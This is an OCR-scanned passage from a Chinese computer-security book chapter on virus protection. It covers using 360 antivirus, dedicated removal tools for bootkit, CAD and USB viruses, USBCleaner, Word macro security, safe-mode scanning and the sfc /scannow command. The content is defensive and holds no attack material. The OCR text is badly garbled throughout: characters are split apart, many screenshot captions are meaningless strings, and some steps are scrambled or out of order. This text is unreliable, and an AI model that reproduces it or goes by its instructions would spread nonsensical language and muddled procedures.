和 处理 硕 ,已 处 理 6 个 夺目 1 
rope Pe 


mss 


[step 图 单 去 “确定 ”按钮 ， 返 回 到 “360 杀 
毒 ” 窗 口 ， 在 其 中 显示 了 被 《360 杀 毒 》 软 
件 处 理 的 项 目 。 
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多 


© aamempmraaemama， -ao- 


[ep 图 单 去 “恢复 区 ” 超 链接 ， 打 开 “360 
恢复 区 ”对 话 框 ， 在 其 中 显示 了 被 《360 杀 
毒 》 软 件 处 理 的 项 目 。 


i 
a ar 
|]= i 
PE = 
PR ET 
RE gl 
ee | 
te | 
eeenxananrean ea re i 
pre 。 


x 


勾 选 “全 选 ” 复 选 框 ， 选 中 所 有 恢复 
区 的 项 目 。 


了、 开间 
EAI 二: 3408 


单 击 “清空 恢复 区 ”按钮 ， 弹 出 一 个 
信息 提示 框 ， 提 示 用 户 是 否 确定 要 一 键 清 
空 恢复 区 的 所 有 隔离 项 。 


@ sme-esewgatrammma? 


确定 Ea 


Step 图 单 去 “确定 ”按钮 ， 即 可 开始 清除 恢 
复 区 所 有 的 项 目 ， 并 显示 清除 的 进度 。 
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step 图 清除 恢复 区 所 有 项 目 完 毕 后 ， 将 返回 
“360 恢 复 区 ”对 话 框 。 
Er 


BT SL 
oem 


es 
sh Cd mm 


另外 ， 使 用 《360 杀 毒 》 软 件 还 可 以 对 
系统 进行 全 盘 杀 毒 。 只 需 在 “病毒 查 杀 ” 
选项 卡 下 单 击 “ 全 盘 扫 描 ” 按 钮 即 可 ， 全 
盘 扫 描 和 快速 扫描 类 似 ， 这 里 不 再 详 述 。 


以 《360 杀 毒 》 软 件 为 例 对 指定 位 置 进 
行 病毒 的 查 杀 ， 具 体 的 操作 步骤 如 下 。 
step 国 在 “360 杀 毒 ” 主 界面 中 单 击 “ 自 定 


Nk shame mA a E 9 
[step 图 打开 “选择 扫描 目录 ”对 话 框 ， 

在 需要 扫描 的 目录 或 文件 前 义 选 相应 的 
复 选 框 ， 这 里 匀 选 “Windows10(C:)” 复 
选 框 。 
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外 口才 cp 波动 各 (G3) Mobile Partner 
四 口 二 本 地 辜 盘 (H) 


单 击 “ 扫 描 ” 按 钮 ， 


目录 进行 扫描 。 


即 可 开始 对 指定 


后 面 步 又 和 “快速 查 杀 ”相似 ， 这 里 


不 再 详细 介绍 。 


全 提示: 大 部 分 杀毒 软件 查 杀 病毒 的 方法 
比较 相似 ， 用 户 可 以 利用 自己 的 杀毒 软件 


进行 类 似 的 病毒 查 杀 操作 。 


5.2.6” 查 杀 宏 病毒 


使 用 《360 杀 毒 》 软 件 还 可 以 对 宏 病 毒 
进行 查 杀 ， 具 体 的 操作 步骤 如 下 。 


毒 扫描 ”图 标 。 


step 轩 在 “360 杀 毒 ” 主 界面 中 单 击 “ 宏 病 


[step 图 弹出 “360 杀 毒 ” 对 话 框 ， 提 示 用 户 
扫描 前 需要 关闭 已 打开 的 Offce 文 档 。 


@ 扫 近 前 清 保 存 并 关闭 已 打开 的 Offce 文 检 


EE EEC | 


step 图 单 击 “确定 ”按钮 ， 即 可 开始 扫描 电 
脑 中 的 宏 病毒 ， 并 显示 扫描 的 进度 。 


step 图 扫描 完成 后 ， 即 可 对 扫描 出 来 的 宏 病 
毒 进行 处 理 ， 这 与 “快速 查 杀 ”相似 ， 这 
里 不 再 详细 介绍 。 


5.2.7” 自 定义 《360 杀 毒 》 软 件 设 置 


使 用 《360 杀 毒 》 软 件 默认 的 设置 ， 可 
以 查 杀 病毒 ， 不 过 如 果 用 户 想 要 根据 自己 
的 需要 加 强 《360 杀 毒 》 软 件 的 其 他 功能 ， 
则 可 以 自 定义 设置 《360 杀 毒 》 软件， 具体 
的 操作 步骤 如 下 。 
[step 团 在 “360 杀 毒 ” 主 界面 中 单 击 “ 设 
置 ” 超 链接 ， 打 开 “360 杀 毒 -设置 ”对 话 
框 。 在 “常规 设置 ”区 域 中 可 以 对 常规 选 
项 、 自 我 保护 状态 、 密 码 保 护 进行 设置 。 
[omss | 


意 olalg 目 


全 友信 关东 委 天 晤 人 旺 ， 护 L 上 人 王八。 


step 图 选择 “升级 设置 ”选项 ， 在 打开 的 
“升级 设置 ”区 域 中 可 以 对 自动 升级 、 是 
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否 使 用 代理 服务 器 升级 进行 设置 。 


3 


自动 有 级 没 轩 
时 避让 有 疾 雪 共计 及 信子 
用， 生生 时 达旦 
也 毒 库 旺 动 六 级， 也 不 旦 升级 提 机 
njH 级 每 天 [S40 四 


其 安 肛 级 没 可 
区 注入 吉本 人 RP 后 用 
二 入 大厅 P10 | 分 圳 后 答 扣 动 和 级 


六 朋 3G 网 络 不 寺 行 升级 


代理 时 扫 关 论 秋 


全 月 fc 且 S 生 


选择 “多 引擎 设置 ”选项 ， 在 打开 的 
“多 引擎 设置 ”区 域 中 可 以 根据 自己 的 电 
脑 配置 及 查 杀 要 求 对 其 进行 调整 。 


二 林村 
QvwEATEEE3 降 
td 
ehavloral 相 5 学 
CNT 和 常规 和 


EE 国 选择 “病毒 扫描 设置 ” 选项， 在 打开 
的 “病毒 扫描 设置 ”区 域 中 可 以 对 需要 要 
描 的 文件 类 型 、 发 现 病毒 时 的 处 理 方式 、 
定时 查 毒 等 参数 进行 设置 。 

EC 


要 要 上 内 的 文件 关 型 


扫 近 所有 文件 
页 位 扫兴 得 序 及 立 档 六 忻 


发 现 俩 表 时 的 站 理 方式 
Q Pens 让 360 闻 志 咎 动 允 浊 

轩 二 用 广 二 至 
有 邓 扫 所 和 项 

BL 

扫 污 Rootlit 病 要 
辣 idk 于 [名 ] Me 的 Bi8 包 
J 在 全 二 全 9 启用 各 名流 jn 连 技术 


[step 图 选择 “实时 防护 设置 ”选项 ， 在 打开 
的 “实时 防护 设置 ”区 域 中 可 以 对 防护 级 
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别 、 监 控 的 文件 类 型 、 发 现 病毒 时 的 处 理 
方式 和 其 他 防护 选项 进行 设置 。 


页 M 抽 雪 果 的 外 志 万 元 
他 声 360 闻 志 上 起 池 理 半 雪 ， 并 后 广 件 在 项 训 区 备 全 
从 砚 所 iD 琶 十 我 本 得 择 让 理 方 区 


时代 隐 护 生 硕 
网 ahikie 本 文件 
加 巧 可 司 翅 风 寺 志 


[Eee 轿 选择 “文件 白 名 单 ” 选 项 ， 在 打开 的 
“文件 白 名 单 ” 设 置 区 域 中 可 以 对 文件 及 
目录 和 白 名 单 、 文 件 扩展 名 白 名 单 进行 添加 
和 删除 操作 。 


设 加 文件 及 有 和 自生 


m 
2 


认 本 文件 太 曾 名 主旨 
的 
a 


有 


EE 


选择 “ 免 打 扰 设 置 ” 选 项 ， 在 打开 的 
“ 免 打扰 设置 ”区 域 中 通过 单 击 “开启 ” 
按钮 启动 免 打扰 状态 。 


Te 


Bee 


Rrra ei 


A 


[step 图 选择 “异常 提醒 ”选项 ， 在 打开 的 
“异常 提醒 ”区 域 中 可 以 设置 上 网 环境 异 
常 提醒 、 进 程 追踪 器 异常 提醒 、 系 统 盘 可 
以 用 空间 监测 异常 提醒 和 自动 校正 系统 时 
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间 噶 常 提 醒 等 。 


上 网 环 过 党 这 避 
过 了 性 到 统 中 上 网 环 壹 异 守 9， 所 是 您 过 行 上 网 0 汉 


过 
问 去 寻 进程 启 到 历史 ,以 及 容 相 占用 信息 


要 全 本 用 空 名 各 测 
| 王 系 统 生 可 和 空间 过 低 和 提醒 (这 三 少 理 ,失忆 系 统 性 


关于 


[step 图 选择 “系统 白 名 单 ” 选 项 ， 在 打开 


的 “系统 白 名 单 ” 区 域 中 可 以 对 系统 修复 
进行 设置 。 设 置 完毕 后 ， 单 击 “ 确 定 ” 按 
钮 ， 即 可 保存 设置 。 


5.3 ”使 用 病毒 专 杀 工 具 查 杀 
病毒 


在 使 用 杀毒 软件 查 杀 病毒 的 过 程 中 ， 
一 些 比较 顽固 的 病毒 是 扫描 不 出 来 的 ， 这 
时 就 需要 使 用 一 些 专门 的 病毒 查 杀 工 具 来 
查 杀 这 些 病毒 了 。 


5.3.1 查 杀 异 鬼 病毒 


异 鬼 病毒 是 腾讯 电脑 管家 捕获 的 一 种 
恶性 Bootkit 病 毒 ， 该 病毒 可 算 改 浏览 器 主 
页 、 动 持 导 航 网 站 ， 并 在 后 台 刷 取 流量 。 不 
过 ， 电 脑 管家 已 全 面 防御 异 鬼 工 病毒 ， 使 用 
电脑 管家 查 杀 异 鬼 工 病 毒 的 具体 操作 步 又 
如 下 。 


step 轩 | 在 电脑 管家 中 下 载 “ 异 鬼 开 病毒 专 杀 
工具 ”， 双 击 运行 工具 ， 即 可 开始 扫描 异 
鬼 开 病毒 。 


加 电脑 乱 系 - 异 光 工 疾 志 专 杀 工具 


检测 电脑 安全 状 


1 


OC 正在 扫描 “ 异 鬼 工 ” 病 毒 ,请 身 候 .… 


~ 入 生 系 红 时 区 
YY 丘 放 系统 内 必 
所 高 寺 5|SSi2 录 VBR 


[step 图 如 果 扫描 过 程 中 没有 发 现 异 鬼 开 病 
毒 ， 将 给 出 电脑 安全 的 信息 提示 。 


局 电脑 官 系 


名 禾 感 染 “ 恒 披 0” 病 毒 ,电脑 管家 已 梯 供 全 面 防 各 


异 见 呈 岳 而 所 示 


IT 
现 “ 异 和 鬼 工 ”病毒 ， 电 脑 安 全 ! 


后 沟 陋 而 隐 尖 性 各 ， 通 过 二 
放肆 让 总 于 正 旭 软件 ,十 有 百 方 驮 字 
黑 格 天 月 生生 所 折 用 广电 后。 表册 mE 


其 广 关 亲 统 


如 果 发 现 异 鬼 开 病毒 ， 将 给 出 电脑 中 
存在 异 鬼 病 毒 的 信息 提示 ， 需 要 用 户 立 即 
进行 查 杀 。 


[I 


0 发 现 ' 导 鬼 II" 病毒 ,i 


从 而 笑 过 安全 钦 件 吾 杀 


Estee 加 单 击 “立即 查 杀 ”按钮 ， 即 可 开始 查 
杀 异 鬼 开 病毒 。 
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导电 及 管家 - 志 史 耳语 要 二 闻 工 具 


() 正在 坦 杀 “ 异 鬼 I” 病毒 


正在 查 杀 “ 异 鬼 II” 病 毒 ,请 簿 候 


取消 


[Bp 较 查 杀 完成 后 ， 将 给 出 异 鬼 本 病毒 已 成 


功 清除 的 信息 提示 。 


5.3.2” 查 杀 CAD 病 毒 


CAD 病 毒 是 利用 Lisp 语 言 编 写 ， 在 CAD 音 
启动 时 自动 加 载 ， 并 自动 生成 扩展 名 为 .sp、 
.fans 的 程序 ， 该 病毒 到 处 传播 ， 致 使 许多 杀 
毒 软件 也 无 能 为 力 ， 甚 至 重 装 CAD 也 不 能 
解决 问题 。《360 CAD 病 毒 专 杀 工 具 》 是 一 
款 针 对 CAD 病 毒 设计 的 查 杀 软件 ， 专 门 查 杀 
CAD 病 毒 ， 让 用 户 的 电脑 得 到 最 佳 保 护 。 
双击 下 载 的 《360 CAD 病 毒 专 杀 工 
具 》， 打 开 “360 CAD 病 毒 专 杀 工 具 ” 工 作 


RS 和 经 


方式 口 长 为 9akg 件 国 诗 和 加 。 口 强力 醒 式 。。 去 360 论 二 所 入， 下 载 320 当 示 入 
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要 扫描 的 分 区 


Bly) CD SR 由 
开始 扫 重 
网 于 
处 用 式 : 顺 名 为 bakg 件 轩 针 入 加 P35 。 口 ] 吉本 术 。。 去 0 后 秆 下 


单 击 “ 开 始 扫描 ”按钮 ， 即 可 开始 扫 
pe 对 于 扫描 出 来 


的 CAD 病 毒 ， 将 直接 进行 查 杀 。 


BeOLGA 目 古 志 专 订 十 | 


忆 9 抽 x 1952 发 RY 0 伯 止 扫描 
正在 要 几 g 录 6 穴 宇 让 茜 下 恩人 第 本 人 
六 全 EE 


外 8 有 式 :口交 名 为 bak& 件 疾 针 入 ES。 总 要 下 。。。 去 二 后 知 下 到 360 和 入 


[Eee 图 扫描 完成 后 ， 如 果 没有 发 现 CAD 病 
将 弹出 一 个 “消息 ”对 话 框 ， 提 示 用 


户 “ 扫 描 结 束 ， 未 发 现 风险 ”的 信息 。 


消息 x 


@ ass= .Fne. 


将 泪 5.3.3 ” 查 杀 顽固 病毒 


”的 顽固 木马 病毒 文件 ， 以 保证 系统 安全 。 


使 用 《360 安 全 卫士 》 查 杀 奖 固 木 马 病毒 的 


具体 操作 步骤 如 下 。 
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step 图 单 击 “ 需 扫 描 的 分 区 ” 右 侧 的 “所 有 
分 区 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 需 


使 用 《360 安 全 卫士 》 可 以 查询 系统 中 


[sp 加 在 360 安 全 卫士 的 工作 界面 中 单 去 
“木马 查 杀 ”按钮 ， 进 入 360 安 全 卫士 木马 


ee 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


病毒 查 杀 工作 界面 ， 在 其 中 可 以 看 到 《360 
安全 卫士 》 为 用 户 提 供 了 3 种 查 杀 方式 。 


pm be 


二 四 单 二 “快速 查 杀 ”按钮 ， 开 始 快速 扫 
描 系统 关键 位 置 。 


OO 正在 扫描 : 系统 启动 大 


下行 中卫 - 共 10 需 


[Sep 图 扫描 完成 后 ， 给 出 扫描 结果 。 对 于 扫 
描 出 来 的 危险 项 ， 用 户 可 以 根据 实际 情况 
自行 清理 ， 也 可 以 直接 单 击 “ 一 键 处 理 ” 
按钮 ， 对 扫描 出 来 的 危险 项 进行 处 理 。 


OO 扫描 完成 ! 共有 1 个 需 处 理 的 危险 项 


© wm tem 


ED samiesere -= ED 


step 园 单 击 “ 一 键 处 理 ” 按 钮 ， 开 始 处 理 打 描 
出 来 的 危险 项 。 处 理 完 成 后 ， 弹 出 “360 木 马 
查 杀 ”对 话 框 ， 在 其 中 提示 用 户 处 理 成 功 。 


处 理 成 功 ! 
需要 重新 启动 电脑 才能 彻底 完成 处 理 ! 建议 立即 重启 ! 


好 的 ， 立刻 重启 稀 后 我 合 行 重启 


5.3.4” 查 杀 U 盘 病毒 


USBCleaner 是 一 款 绿色 的 辅助 杀毒 工 
具 ， 具 有 检测 查 杀 U 盘 病毒 、U 盘 病毒 广 谱 
扫描 、U 盘 病毒 免疫 、 修 复 显示 隐藏 文件 及 
系统 文件 、 安 全 卸载 移动 盘 等 功能 ， 可 以 
全 方位 一 体 化 修复 并 查 杀 U 盘 病毒 。 


1. 全 面 检测 系统 


使 用 USBCleaner 全 面 检测 系统 病毒 的 
具体 操作 步骤 如 下 。 
step 加 从 网 上 下 载 U 盘 专 杀 工 具 ， 其 文件 来 


中 包含 的 文件 如 下 图 所 示 。 

ENE er] 二 日文 
En" := == 鲁 @ 
+ + -个 i | ri] 

BE 床 一 
四 ti 访问 
四 MscoMcruoox 
OncDrive I ReadMete 
加 Readme-miR em 
3 es 
Et UcStoreexe 
x uroME De 
bE 园 UppaTEINI 
由 三 
园 5 
wpdoneoecy 
本 (DH 
本 
本 


机 GH ， 
20 个。 自 1 个 项 日 887 MB 


[step 图 双击 “USBCleanerexe” 图 标 ， 打 开 
“U 盘 病毒 专 杀 工 具 USBCleanerV6.0” 对 
话 框 。 


MM 
二 二 二 家 为 反 氏 二 宙 于 
0% 


BD coseeeore 


step 图 单 去 “全 面 检测 ”按钮 ， 即 可 对 系统 
进行 扫描 。 


第 5 章 ”电脑 病毒 的 防护 策略 = 


U 重启 毒 喜 杀 工具 USBCileanerV6.0 


nL hgent blr 痪 考 还 有 461 而 待 检 青 稍 全 


| 


step 加 在 扫描 的 过 程 中 ， 如 果 发 现 病毒 ， 
则 会 在 下 面 的 列表 中 显示 ， 包 括 病毒 的 名 
称 、 文 件 路 径 和 处 理 状态 。 


U 熏 腐 南 专 亲 工 具 USBCleanerV6.0 


大 存储 站 得 要 请 用 充 成， 


坦 亲 进度， 1008 610 了 入 


2. 检测 移动 盘 

使 用 USBCleaner 检 测 移动 盘 病毒 的 具 
体操 作 步 骤 如 下 。 
[step 图 单 击 “检测 移动 盘 ” 按 钮 ， 打 开 “ 移 
动 存储 病毒 处 理 模块 V1.1” 对 话 框 。 


移动 存 鱼 病 毒 处 理 模块 Y1- 1 


检测 移动 硕 盘 返回 主 程序 
强制 去 除 文件 夹 目录 系统 隐藏 属性 


单 去“ 检测 U 盘 ”按钮 ， 打 开 “ 干 万 
不 可 直接 插 拔 USB 盘 ”提示 框 。 


lewwlixb 3 


[i 其 他 操作 ， 失 摘 中 如 果 程序 出 现 很 死 ， 请 用 
任 和 管理 闫 结 束 本 程序 进程 , 千 万 不 可 直接 播 找 USB 盘 ! 


Ew | 


[tsp 图 单 去 “确定 ”按钮 ， 打 开 “ 已 发 现 U 
盘 ” 信 息 提示 框 。 
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满 息 x 


6 已 汪 现 U 雪 |、\ 近 漂 用 查 亲 楼 块 


Step 加 单 去 “确定 ”按钮 ， 即 可 对 本 机 中 的 
U 盘 进行 检查 ， 待 检测 完毕 后 ， 弹 出 “已 完 
成 检测 ”对 话 框 。 


GooD x 


@ “emamena! 


[Sep 图 单 击 “确定 ”按钮 打开 “移动 盘 检 
已 完成 ， 是 否 调用 FolderCure 查 杀 U 盘 中 
的 文件 夹 图 标 病毒 ”提示 框 。 


lewwlixb 


@ 移动 熏 检 测 已 完成 ! 是 否 调 用 FolderCure 章 杀 U 盘 十 的 文件 交 晶 标 病 
画 ? 


[aw ] ww | 


上 单 击 “ 是 ”按钮 ， 打 开 用 USBCleaner 
Sn 
FolderCure” 对 话 框 来 检测 文件 夹 图 标 病 毒 。 


[文件 兴国 怀 病 过 去 单 工 月 reldorcare 


所 新 向。 坦 亲 村 式 更新 市 二 库 。 再 从 页 。。 程序 交 于 
机 扫 栅 守 铺 。 当前 天 所 寺 杀 1 


PS 


BEE LL 人 一 一 
BR: 0 nal: 0 克昌 了 目 亲 。 反 财 1 检 I 向 缮 六 程 信 屋 同和 件 天 。 末 后 用 广 话剧 
序号 交 壹 吉 称 文件 陪 公 扫 态 


[EGG 图 单 击 “开始 扫描 ”按钮 ， 弹 出 “请 
选择 扫描 对 象 ”信息 提示 。 这 里 采用 系统 
默认 设置 ， 即 “执行 全 盘 扫 档 (默认 ) ” 
选项 。 


请 选择 扫描 对 象 : 


ec TE 


1 秒 后 设 有 选择 梅 自动 执行 全 盘 扫 找 


个 执行 全 盘 扫 描 ( 默认 》 个 执行 u 抵 扫描 ” 执行 自 定 路 径 扫 描 ”个 只 焦 复 文件 来 
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SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


step 图 选择 完毕 后 ， 即 可 对 系统 中 的 全 盘 进 


行文 件 夹 图 标 病毒 的 扫描 。 


ET TT 


[step 图 待 检测 完毕 后 ， 会 在 “移动 存储 病毒 


处 理 模块 V1.1” 对 话 框 中 看 到 相应 的 操作 
上 日志。 


ET 


厂 到 加 主 程 原 


— 


| sm | 
到 际 文 件 夫 日 隶 统 阳性 


3. 检测 未 知 病毒 


使 用 USBCleaner 检 测 未 知 病毒 的 具体 
操作 步骤 如 下 。 
在 “UU 盘 病毒 专 杀 工具 USBCleaner 
V60” 对 话 框 中 单 击 “ 广 谱 侦 测 ” 按 钮 ， 即 
可 看 到 “不 能 完全 查 杀 未 知 病毒 ”对 话 框 。 
Ee x 


痢 广 圭 性 剂 是 一 种 高 级 启发 式 喜 页， 目前 主要 还 要 提示 你 有 无 未 知 病毒 ， 
[9 并 不 能 完全 理 杀 未 知 病毒 ! 


Ew | 


[step 国 单 击 “ 确定” 按钮 ， 即 可 进行 光谱 
ws 待 侦 测 完毕 后 会 把 本 机 中 所 有 的 
autorun .inf 文件 列 出 来 。 


部 全 
次 全 
2 
Rs 
EH 
a 
局 
3 
9 
Es 
Rs 
本 
区 
强 


各 


E 
1 


上 


[step 图 在 “U 盘 病毒 专 杀 工 具 USBCleaner 
V6.0” 对 话 框 中 选择 “工具 及 插件 ”选项 
卡 ， 在 其 中 可 以 对 UU 盘 病 毒 免疫 、 移 动 硬盘 
卸载 、USB 设 备 痕 迹 清理 、 系 统 修复 等 属 
性 进行 设置 。 


1U 因 声 表 专 亲 工具 USBCleanerV6.0 


第 5 章 ”电脑 病毒 的 防护 策略 = 


[Fo E x 


USBCleaner 师 取 桓 苹 
USBMON V4.0 


Secure Your Digital Life 


过 本 十 过 提 达 关闭 日 其 信 忆 关 记 
| ED 国 3 EE I 


大 本 过 关 亲 系统 自动 只 
i] 


SR 


5p 国 单 直 “其 他 功能 ”按钮 ， 在 打开 的 窗 


step 贺 单 击 “USB 设 备 痕迹 清理 ”按钮 ， 打 
开 “USB 设 备 使 用 记录 清理 ”对 话 框 ， 在 
其 中 显示 了 USB 设 置 的 使 用 记录 。 


US8 讼 备 使 用 记录 清理 


Da:2017-01-06 14.39 36 
0 00 00 00 00 00 

TESTTOP- 

Gadeat 1SE Deries 

= 0disk inf, Misk_dvdese Di drive 


ees61-e325 -11erbfel-0e002del 90} 
pm enkaot rs 人 standard disk drives) 
“305-1 cerbicl-08002bel0318} IOCZ 


= 2018-12-22 11 25:22 


skavdes eo Disk rive 


”A ER 
EGG 图 单 二 “清理 所 有 记录 ”按钮 ， 即 可 将 
所 有 的 USB 使 用 记录 清除 。 


lewwlixb x 


@ se 
= | 


[step 图 选择 “后 台 监 控 ” 选 项 卡 ， 在 桌面 
上 的 状态 栏 中 双击 “USBMON 监 控 程 式 ” 
图 标 转 即 可 打开 “USBMON 监 控 程 式 ” 对 
话 框 ， 在 其 中 可 以 对 监控 的 各 个 属性 进行 
设置 。 


机 口中 即 可 对 U 盘 的 写 保护 和 文件 目录 强制 册 
Wnr sisemme, EAA Rann, ements 除 进行 设置 。 
下 seoom 六 次 
USBCleaner 监 基 程式 Secure Your Digital Life 
(ET 


当前 当 控 钛 杞 。 靳 规 生 控 已 关闭 日期 过失 已 关 问 


| sms - - 
i 
有 
EL ED 
作品 如 
DS 


] Be [Ra 


5.4 实战 演练 


实战 演练 1 一 一 在 Word 中 预防 宏 病毒 时 
包含 宏 的 文档 更 容易 感染 病毒 ， 所 以 凯 

用 户 需要 提高 宏 的 安全 性 。 这 里 以 在 Word 

2016 中 预防 宏 病毒 为 例 来 讲解 预防 宏 病毒 

的 方法 ， 具 体 的 操作 步骤 如 下 。 

打开 包含 宏 的 文档 ， 选 择 “文件 ” 

“选项 ”选项 。 


1 -wordl 到 ? a x 


”| 检查 文档 


| 在 汉 布 比 之前. 诗 生 室 共生 : 
i 文 区 屋 性 fn 作者 的 过 名 


管理 文档 


Ee 
[RQ | str 
BB | 9 sma 
人 人 口 
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SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


step 园 打开 “Word 选 项 ”对 话 框 ， 选 择 命令 ， 单 击 “ 确 定 ” 按 钮 。 


“信任 中 心 ” 选 项， 然后 单 击 “ 信 任 中 心 友和 x | 
这 轩 六 拉 
设置 ”按钮 。 可 。 windcws 村 要 堪 字 F 入 的 名称 ,为 你 打开 相 应 的 和 序 

可 ze 二 i ntemet EH. 

Word 选 页 ? x 

= so | 莉 玛 | 

eo 转 吏 和 和 安全 以 及 计算 机 的 快 史记 这 - 

ez Ce wm | 


[Es 镜 出 “系统 配置 ”对 话 框 ， 选 择 
“引导 ”选项 卡 ， 在 “引导 选项 ”下 勾 选 
5 | “安全 引导 ” 复 选 框 、 选 中 “最 小 ” 单 先 


| 


弹出 “信任 中 心 ”对 话 框 ， 在 左 侧 列 
表 中 选择 “ 宏 设 置 ” 选 项 ， 然 后 在 “ 宏 设 
置 ” 列 表 中 选中 “禁用 无 数字 签署 的 所 有 
宏 ” 单 选 按钮 ， 单 击 “ 确 定 ”按钮 。 


信任 中 心 外 “并 


eol 口 和 73 民生 
四 


[本 | Ww | mw || 砚 


单 走 “确定 ”按钮 ， 即 可 进入 系统 的 
安全 模式 。 


辐 实战 演练 2 在 安全 模式 下 查 杀 病毒 step 园 进入 安全 模式 后 ， 即 可 运行 杀毒 软 


件 ， 进 行 病毒 的 查 杀 。 
安全 模式 的 工作 原理 是 在 不 加 载 第 三 
方 设备 驱动 程序 的 情况 下 启动 电脑 ， 使 电 
脑 运行 在 系统 最 小 模式 下 ， 这 样 用 户 就 可 
以 方便 地 查 杀 病毒 ， 还 可 以 检测 与 修复 计 
算 机 系统 的 错误 。 这 里 以 Windows 10 操 作 _ 
系统 为 例 来 讲解 在 安全 模式 下 查 杀 并 修复 人 人 
系统 错误 的 方法 ， 具 体 的 操作 步骤 如 下 。 | | 
[step 图 按 Windows+R 组 合 键 ， 弹 出 “运行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 msconfig 
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5.5 “小 试 身 手 
练习 1: 使 用 命令 修复 系统 错误 


查 杀 完 成 后 ， 就 可 以 使 用 命令 修复 系 
统 错误 了 。SFC 命 令 是 Windows 操 作 系统 中 
使 用 频率 比较 高 的 命令 ， 主 要 作用 是 扫描 
所 有 受 保护 的 系统 文件 并 完成 修复 工作 。 
该 命令 的 语法 格式 如 下 。 


SFC"/SCANNOW""/SCANONCE""/SCANBOOT""/ 
REVERT""/PURGECACHE""/CACHESIZE=Xx" 


各 个 参数 的 含义 如 下 。 
e /SCANNOW: 立即 扫描 所 有 受 保护 
的 系统 文件 。 
e /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e /SCANBOOT: 每 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e@ /REVERT: 将 扫描 返回 到 默认 设置 。 
e@ /PURGECACHE: 清除 文件 缓存 。 
e /CACHESIZE=x: 设置 文件 缓存 
大 小 。 
以 最 常用 的 SFC/SCANNOW 为 例 ， 修 
复 系统 错误 的 具体 操作 步骤 如 下 。 
[step 回 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “命令 提示 符 (管理 员 ) (A) ” 
选项 。 


任务 管理 圳 (T) 
控制 面板 (P) 


文件 资源 管理 露 (E) 


关机 或 注销 (U) 


点 面 (D) 


命令 提示 符 ” 窗 
按 Enter 键 


step 轩 弹出 “管理 员 : 
口 ， 输 入 命令 “sfc/scannow”， 
确认 。 


第 5 章 ”电脑 病毒 的 防护 策略 = 


画 管理 员 : C\WINDOWS\system32\cmd.exe - 5。 一 口 x 


Microsoft Windows [版 本 10.0. 17134, 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>sfc/scannow 


step 图 开始 自动 扫描 系统 ， 并 显示 扫描 的 
进度 。 


丽 管理 员 ; CWWINDOWS\system32\cemd.exe - 5. 一 口 x 


中 crosoft Windows [版 本 10.0. 17134. 319] A| 
(c) 2018 Ji crosoft Corporation。 保 留 所 有 权利 。 | 


C:\Users\Administrator>sfc/scannow 

开始 系统 扫描 。 此 过 程 将 需要 一 些 时 间 。 
始 系统 扫描 的 验证 阶段 。 

下 


在 扫描 的 过 程 中 ， 如 果 发 现 损坏 的 系 
统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 
复 后 的 信息 。 

而 知 aR: CWWINDOWS\system32\emd exe | 


P:NUsersNAdministratorysfc/scannow 
开始 系统 扫描 。 此 过 程 将 需要 一 些 时 间 。 
许昌 搬入 内 息 。 


找到 了 损坏 文 ; 它 
站 好 ts a 

indows\Logs. of 

i 详细 信息 


P:NUsersNAdministratorye 


后 DGFILE 


练习 2: 设置 默认 打开 应 用 程序 


一 个 应 用 可 能 有 多 种 打开 方式 ， 有 时 6 
希望 默认 的 应 用 来 打开 特定 的 文件 ， 就 可 
以 设置 默认 打开 程序 ， 下 面 介绍 通过 设置 
面板 进行 设置 默认 打开 应 用 程序 的 方法 。 
设置 面板 是 Windows 10 新 增 的 设置 功能 面 
板 ， 包 含 了 系统 的 主要 设置 ， 在 该 面板 中 同 
样 可 以 设置 默认 应 用 ， 具 体 的 操作 步骤 如 下 。 
[step 图 按 Windows+I 组 合 键 ， 打 开 “Windows 
设置 ”面板 ， 单 击 “ 应 用 ”图 标 选项 。 
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加 ER 
Windows 设 车 
三 
= 本 区 
加 
EE ni 


图 I 


Step 加 单 击 “ 应 用 ”界面 左 侧 的 “默认 应 
用 ”选项 ， 即 可 看 到 电子 邮件 、 地 图 、 
音乐 播放 器 、 图 片 查看 器 等 默认 打开 的 


应 用 。 

站 o x 
Qn 默认 应 用 
要 找 设 于 选择 默认 的 应 用 
而 用 中 好 件 

丘 “ 应 用 和 功 和 加 本 

5 WR 十 
和 回 i 

加 “可 使 用 网 站 打开 的 应 用 

避 机 RN 帮 而 入 履 占 
局 © Bima 

网 H 关 五 


step 图 在 要 改变 默认 打开 应 用 图 标 上 单 击 ， 
弹出 “选择 应 用 ”列表 ， 选 择 要 使 用 的 应 
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用 程序 ， 即 可 进行 更 改 ， 如 这 里 将 音乐 播 
放 器 的 打开 程序 设置 为 “Groove 音乐 ”。 


二 oD x 
全 an 点 计 让 中 
二 选择 ee 
EY Sroove 
a sa| 回 sse 


et 四 回 Windows Media Player 
地 9 风电 云 间 乐 
加 


回 加 在 Micresoft store 中 查找 加 用 


Wei Ws 
id 6 网 局 云 音 乐 
照片 蛮 看 器 


step 园 在 对 应 的 文件 中 ， 如 歌曲 类 型 的 文 
件 ， 则 变 为 Groove 音乐 的 图 标 。 


小 | 回 昌 = | 各 ER - 0 x 
FE 0 


个 小 < Administ..， 音乐 v 局 | 更 过 "并 乐 ” 岂 


~ 


回 G.E.M. 穿越 火线 .mp3 


才 快速 访问 回 GEM. Md (ivejmp3 
三 OneDrive 同 G.E.M. 红 栈 栈 白 玫瑰 mp3 
回 G.E.M. 龙卷风 mp3 

时 vem 回 GE.M. 滨 梧 (Live)}.mp3 
本 3D 对 入 同 G.E.M. 死 了 痢 要 要 (Live).mp3 
图 视 吉 
辐 加 片 
图 文 类 
及 下 或 
小 三 

6 个 项 目 = 图 


第 6 昔 ” 电 脑 系统 安全 的 防护 策略 


用 户 在 使 用 计算 机 的 过 程 中 ， 会 受到 恶意 软件 的 攻击 ， 有 时 还 会 不 小 心 删除 系统 文 
